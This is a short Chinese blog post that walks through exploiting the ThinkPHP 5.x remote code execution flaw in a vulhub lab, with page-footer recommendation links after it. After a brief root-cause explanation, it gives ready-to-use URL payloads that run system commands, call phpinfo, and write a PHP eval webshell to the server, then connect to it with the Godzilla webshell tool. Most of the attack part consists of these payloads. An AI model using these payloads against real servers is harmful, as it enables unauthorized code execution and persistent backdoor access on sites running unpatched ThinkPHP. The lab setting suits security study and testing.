Thinkphp5x远程执行命令及getshell

一.环境配置

靶场:vulhub/thinkphp/5-rce

docker-compose up -d #启动环境

访问靶场:

漏洞利用:

漏洞根本源于 thinkphp/library/think/Request.php 中method⽅法可以进⾏变量覆盖,通 过覆盖类的核⼼属性filter导致rce,其攻击点较为多,有些还具有限制条件,另外由于种种部分 原因,在利⽤上会出现⼀些问题

远程命令执行:

POC:?s=index/think\app/invokefunction&function=call_user_func_array&vars0=system&vars1 \[\]=whoami

执行完如下图

远程代码执行:

POC:?s=index/think\app/invokefunction&function=call_user_func_array&vars0=phpinfo&vars1\[\]=-1

如下图

写入一句话木马:

POC:?s=index/think\app/invokefunction&function=call_user_func_array&vars0=system&vars1\[\]=echo "<?php @eval(\$_POSTcmd);?>">>3.php

然后去访问我们的3.php 创建成功

哥斯拉连接:

相关推荐
lvchaoq4 分钟前
this指向面试代码输出题目合集
javascript·面试·职场和发展
倒流时光三十年7 分钟前
Logback 系列(7):常用 Appender(控制台 / 文件 / 滚动文件)
java·前端·logback
sycmancia14 分钟前
Qt——另一种创建线程的方式
开发语言·qt
极客先躯25 分钟前
高级java每日一道面试题-2026年04月18日-实战篇[Docker]-如何处理金融行业的时序数据容器化?
java·运维·docker·容器·金融·时序数据·高级面试
hdsoft_huge30 分钟前
SpringBoot系列18:SpringSecurity登录鉴权,JWT无状态Token认证完整流程(生产级落地)
java·spring boot·后端
野蛮人6号39 分钟前
黑马天机学堂系列问题之选集8本地服务报错
java·spring cloud·黑马程序员·天机学堂·黑马天机学堂
你怎么知道我是队长1 小时前
JavaScript 函数 this 全解
开发语言·javascript·ecmascript
L-影1 小时前
单体项目结构
java·开发语言
wuqingshun3141591 小时前
MySQL 如何解决深度分页问题?
java·mysql·面试
buhuizhiyuci1 小时前
【算法篇】位运算 —— 基础篇
java·数据库·算法